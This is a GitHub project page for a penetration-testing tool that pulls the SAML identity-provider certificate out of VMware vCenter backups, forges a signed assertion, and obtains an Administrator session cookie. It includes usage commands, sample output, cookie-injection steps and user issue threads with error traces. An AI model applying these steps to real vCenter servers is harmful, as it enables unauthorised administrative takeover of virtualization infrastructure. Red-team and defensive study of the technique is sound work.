A tool to extract the IdP cert from vCenter backups and log in as Administrator

horizon3ai, updated 2022-12-22 02:36:46

vCenter SAML Login Tool

A tool to extract the Identity Provider (IdP) cert from vCenter backups and log in as Administrator

Background

Commonly, during engagements, we will gain access to vCenter backups on a fileserver or gain root access to the VCSA host through recent CVEs. Logging into the vCenter vSphere UI allows us to easily gain access to more systems, confidential information, as well as show customers the impact of these findings.

The data.mdb file contains the certificates and can be found within vCenter backups as well as on the VCSA host with root permissions. These certificates are stored in cleartext and can be used to sign any SAML authentication request for any user, including the built-in Administrator.

If you'd like to know more about several use cases for this tool and how we've used it to gain Administrative access to vCenter hosts check out our blog post: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Usage

```
[email protected]:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
```

With the above cookie, visit the VCSA instance at https://<VCSA>/ui, add the cookie under the /ui path, and re-browse to https://<VCSA>/ui.

Demonstration

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Issues

Update vcenter_saml_login.py

opened on 2022-12-22 02:36:45 by Blyth0He

bug fix

vSphere 6.7 Error: Exception: expected 302 redirect

opened on 2022-09-25 13:04:39 by TryA9ain

I use vcenter_saml_login.py, but it errors.


Then I see #13 and use its py, but it errors too.


[-] Failed signing the SAML assertion ('Could not deserialize key data')

opened on 2022-04-11 13:58:22 by corsch

Did anyone else have issues with "Failed signing the SAML assertion"?

```
python3 vcenter_saml_login.py -p data.mdb -t -v
[*] Extracted IdP certificate: -----BEGIN PRIVATE KEY----- ... -----END PRIVATE KEY-----

[*] Successfully extracted the IdP certificate
[!] Looking for cert 1 at position: 69734592
[!] CN end position: 69735640
[*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,cn=.,cn=Tenants,cn=IdentityManager,cn=Services,dc=,dc=
[*] Domain: .
[!] Cert 1 size: 999
[*] Extracted Trusted certificate: -----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----

[*] Successfully extracted trusted certificate 1
Cert 2 Size: 1053
[*] Extracted Trusted certificate: -----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----

[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname  for 
[*] Initiating SAML request with 
[*] Generating SAML assertion
[*] Signing the SAML assertion
[-] Failed signing the SAML assertion
Traceback (most recent call last):
  File "/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 349, in <module>
    s = sign_assertion(t, trusted_cert_1, trusted_cert_2, idp_cert)
  File "/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 281, in sign_assertion
    signed_assertion = signer.sign(root, reference_uri=assertion_id, key=key, cert=[cert1, cert2])
  File "/usr/local/lib/python3.9/dist-packages/signxml/__init__.py", line 398, in sign
    key = load_pem_private_key(ensure_bytes(key), password=passphrase, backend=default_backend())
  File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/primitives/serialization/base.py", line 22, in load_pem_private_key
    return ossl.load_pem_private_key(data, password)
  File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 823, in load_pem_private_key
    return self._load_key(
  File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1070, in _load_key
    self._handle_key_loading_error()
  File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1129, in _handle_key_loading_error
    raise ValueError(
ValueError: ('Could not deserialize key data. The data may be in an incorrect format, it may be encrypted with an unsupported algorithm, or it may be an unsupported key type (e.g. EC curves with explicit parameters).', [_OpenSSLErrorWithText(code=218529960, lib=13, reason=168, reason_text=b'error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wrong tag'), _OpenSSLErrorWithText(code=218546234, lib=13, reason=58, reason_text=b'error:0D06C03A:asn1 encoding routines:asn1_d2i_ex_primitive:nested asn1 error'), _OpenSSLErrorWithText(code=218640442, lib=13, reason=58, reason_text=b'error:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error'), _OpenSSLErrorWithText(code=151498765, lib=9, reason=13, reason_text=b'error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib')])
```

I get the same error when trying to "check" the key with openssl:

```
openssl rsa -in private.key -check

unable to load Private Key
139866836145536:error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wrong tag:../crypto/asn1/tasn_dec.c:1149:
139866836145536:error:0D06C03A:asn1 encoding routines:asn1_d2i_ex_primitive:nested asn1 error:../crypto/asn1/tasn_dec.c:713:
139866836145536:error:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error:../crypto/asn1/tasn_dec.c:646:Field=version, Type=PKCS8_PRIV_KEY_INFO
139866836145536:error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib:../crypto/pem/pem_pkey.c:88:
```

The decrypted cookie from vcenter 7.0.3 cannot log in to vcenter

opened on 2022-03-31 09:25:50 by qin-9

I decrypt the cookie using the script and can't log in to vCenter.

Add better validation of keys and certificates

opened on 2022-03-09 15:02:11 by bpg-it-raphaeljohn

This should differentiate better between keys and certificates by adding a validation function for both. Probably fixes #6

Thanks for adding the license.

An error is reported when the script is running

opened on 2022-03-09 07:24:33 by Chinakentgao

```
[email protected]:~/CVE-2021-22005-exp# python3 vcenter_saml_login.py -p data.mdb -t xxx.xx.xxx.xxx
[*] Successfully extracted the IdP certificate
[*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,CN=e4ed3720-803d-4d2e-bbd1-3b5221182357,CN=Ldus,CN=ComponentManager,DC=vsphere,DC=local
[*] Domain: vsphere.local
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcenter.tech.zone for xxx.xx.xxx.xxx
[*] Initiating SAML request with xxx.xx.xxx.xxx
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[-] Failed logging in with SAML request
Traceback (most recent call last):
  File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 350, in <module>
    c = login(args.target, s)
  File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 300, in login
    raise Exception("expected 302 redirect")
Exception: expected 302 redirect
```

xxx.xx.xxx.xxx is an Internet IP.

Horizon 3 AI Inc